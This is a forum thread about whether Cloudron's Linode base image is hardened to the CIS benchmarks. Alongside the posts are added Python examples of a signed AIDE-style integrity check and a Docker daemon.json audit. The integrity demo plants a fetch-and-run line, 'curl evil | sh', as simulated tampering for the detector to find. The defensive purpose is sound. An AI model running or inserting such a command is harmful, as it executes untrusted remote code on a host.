Cloudron on Linode CIS Benchmarks for the Base Image
-
Does the Cloudron application base image on Linode harden against CIS benchmarks?
If not, what was the thinking behind not doing so?
Is there a plan to implement this for added security?
-
@dark-shadow currently the Linode image is not checked or hardened against the CIS benchmark. Do you have further information on the process to do so?
-
Thanks for the reply, here is some further info:
https://ubuntu.com/security/certifications/docs/cis
https://github.com/alivx/CIS-Ubuntu-20.04-Ansible
You can download the full report from here:
https://www.cisecurity.org/benchmark/ubuntu_linux/
Let me know your thoughts
-
I checked this out quickly following https://ubuntu.com/security/certifications/docs/cis-installation.
It seems that CIS is available only under an Ubuntu Pro subscription (even though that's free for personal use). I was able to register as a personal instance and then run the benchmarks. It installs many packages (like postfix etc.) and also configures a whole bunch of stuff. On Cloudron, most things run inside docker, so many of them simply won't be configured right since it's configuring the host system and not the containers. It also seems to apply some ufw rules, which is incompatible with the docker firewall. I learnt about this tool called AIDE (https://www.hackerxone.com/2021/09/23/step-by-step-to-install-aide-on-ubuntu-20-04-lts/) which tracks file changes, but I think this also needs to upload reports to a trusted server to track changes (not sure).
Ignoring the subscription aspect, which makes it a no-go already since we cannot rely on Canonical subscriptions, the best we can do is pick best practices from CIS and apply them to Cloudron's base image.
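The "upload reports to a trusted server" question above is the crux of any file-integrity tool: a baseline stored only on the monitored host can be rewritten by the same attacker who modified the files. The following is an added example (not AIDE's code, not Cloudron's, and not from the original post) of a minimal AIDE-style baseline: it hashes a directory tree, authenticates the baseline database with an HMAC key that is assumed to be held off-host, and reports added, removed and changed files. The directory contents, the file names and the key value are all constructed for the demo.

```python
"""Added example: AIDE-style file-integrity baseline with an off-host HMAC key.
Not AIDE's or Cloudron's code; paths, contents and key are constructed."""
import hashlib
import hmac
import json
import os
import stat
import tempfile
from pathlib import Path

# Assumption for the demo: this key lives on a trusted remote host (or read-only
# media) and is only handed to the checker at run time. Hypothetical value.
OFFHOST_KEY = b"hypothetical-key-held-on-trusted-server"


def file_record(path: Path) -> dict:
    """Content hash plus the metadata an integrity check usually tracks."""
    st = path.lstat()
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size}


def build_baseline(root: Path) -> dict:
    """Record every regular file under root, keyed by its relative path."""
    records = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            records[str(p.relative_to(root))] = file_record(p)
    return records


def sign_baseline(baseline: dict, key: bytes) -> bytes:
    """Deterministic JSON plus an HMAC tag: a root-level attacker who rewrites
    the on-host database cannot forge the tag without the off-host key."""
    body = json.dumps(baseline, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"\n" + tag


def load_baseline(blob: bytes, key: bytes) -> dict:
    """Verify the tag before trusting anything in the database."""
    body, _, tag = blob.rpartition(b"\n")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("baseline signature mismatch: tampered database or wrong key")
    return json.loads(body)


def compare(baseline: dict, current: dict) -> dict:
    """Added / removed / changed files, with the attributes that changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for name in set(baseline) & set(current):
        diff = [k for k in baseline[name] if baseline[name][k] != current[name][k]]
        if diff:
            changed[name] = diff
    return {"added": added, "removed": removed, "changed": changed}


def demo() -> dict:
    """Constructed scenario: baseline a tree, tamper with it, detect it, and
    confirm that a tampered baseline database is rejected outright."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "etc").mkdir()
        (root / "etc" / "ssh_config").write_text("PermitRootLogin no\n")
        (root / "etc" / "motd").write_text("welcome\n")
        blob = sign_baseline(build_baseline(root), OFFHOST_KEY)

        # Simulated post-baseline tampering.
        (root / "etc" / "ssh_config").write_text("PermitRootLogin yes\n")  # changed
        (root / "etc" / "motd").unlink()                                   # removed
        (root / "etc" / "rc.local").write_text("curl evil | sh\n")         # added
        os.chmod(root / "etc" / "rc.local", 0o755)

        report = compare(load_baseline(blob, OFFHOST_KEY), build_baseline(root))

        # Flip a byte of the stored database: verification must fail, not parse.
        try:
            load_baseline(b"X" + blob[1:], OFFHOST_KEY)
            report["tampered_rejected"] = False
        except ValueError:
            report["tampered_rejected"] = True
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The HMAC only helps if the key is genuinely unavailable to an attacker on the host, so in practice the signed baseline (or the key) is kept on the trusted server the post mentions, and the report from each run is shipped there as well; a local-only database is little better than no database.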
-
Also,
/usr/share/ubuntu-scap-security-guides/cis-hardening/Canonical_Ubuntu_20.04_CIS-harden.sh lvl2_server
has been running for the past 45 minutes and seems stuck in aide --init.
-
@girish I would say pick and choose what is applicable; obviously you would know best. It's also worth noting there are CIS benchmarks specifically for Docker containers, which might be a better fit. You could combine the two for better hardening.
https://www.cisecurity.org/benchmark/docker/
https://github.com/docker/docker-bench-security
Let me know what you think
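As an added example of the "pick and choose" approach for the Docker side (this is not docker-bench-security's code, not Cloudron's, and not from any post above), the script below audits a Docker daemon.json against a handful of daemon-configuration settings that the CIS Docker Benchmark covers, with a constructed weak configuration beside a corrected one. The check identifiers and messages are this example's own, and the mapping to benchmark items is paraphrased rather than quoted; notably the `iptables` check is the flip side of the ufw problem mentioned earlier in the thread, since turning off Docker's own iptables management to please a host firewall script breaks container networking.

```python
"""Added example: audit a Docker daemon.json against a subset of CIS-style
daemon settings. Not docker-bench-security's or Cloudron's code; both configs
below are constructed for the demo."""
import json

# Constructed weak configuration: nothing hardened, experimental features on,
# a plain-HTTP registry, and Docker told not to manage iptables.
WEAK_DAEMON_JSON = """{
  "icc": true,
  "experimental": true,
  "insecure-registries": ["registry.example.internal:5000"],
  "iptables": false
}"""

# Constructed corrected configuration for the same checks.
HARDENED_DAEMON_JSON = """{
  "icc": false,
  "userns-remap": "default",
  "live-restore": true,
  "userland-proxy": false,
  "no-new-privileges": true,
  "iptables": true,
  "log-level": "info"
}"""


def audit_daemon_config(cfg: dict) -> list:
    """Return (check_id, message) for every setting that is weak or missing.
    Defaults assumed here are the daemon's own defaults when a key is absent."""
    findings = []
    if cfg.get("icc", True):
        findings.append(("icc", 'containers on the default bridge can talk freely; set "icc": false'))
    if not cfg.get("userns-remap"):
        findings.append(("userns-remap", 'user namespaces off; set "userns-remap": "default"'))
    if not cfg.get("live-restore", False):
        findings.append(("live-restore", 'containers stop on daemon restart; set "live-restore": true'))
    if cfg.get("userland-proxy", True):
        findings.append(("userland-proxy", 'docker-proxy handles published ports; set "userland-proxy": false'))
    if not cfg.get("no-new-privileges", False):
        findings.append(("no-new-privileges", 'setuid escalation inside containers allowed; set "no-new-privileges": true'))
    if cfg.get("experimental", False):
        findings.append(("experimental", "experimental features enabled in production"))
    if cfg.get("insecure-registries"):
        findings.append(("insecure-registries", "plain-HTTP registries configured: %s"
                         % ", ".join(cfg["insecure-registries"])))
    if not cfg.get("iptables", True):
        findings.append(("iptables", 'Docker cannot manage iptables, container networking will break; set "iptables": true'))
    if cfg.get("log-level", "info") != "info":
        findings.append(("log-level", 'daemon log level is not "info"'))
    return findings


def finding_ids(daemon_json_text: str) -> list:
    """Sorted check identifiers that fail for the given daemon.json text."""
    return sorted(check_id for check_id, _ in audit_daemon_config(json.loads(daemon_json_text)))


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label)
        for check_id, msg in audit_daemon_config(json.loads(text)) or [("ok", "no findings")]:
            print("  %-20s %s" % (check_id, msg))
```

Each finding is a judgement call against how the platform actually uses Docker, which is exactly the pick-and-choose point: `userns-remap` changes file ownership inside volumes and `icc: false` cuts traffic on the default bridge, so either may be wrong for a system whose containers are expected to talk to each other, whereas `no-new-privileges` and `live-restore` are rarely controversial. The Docker benchmark also has host-level and per-container items that a daemon.json audit does not cover.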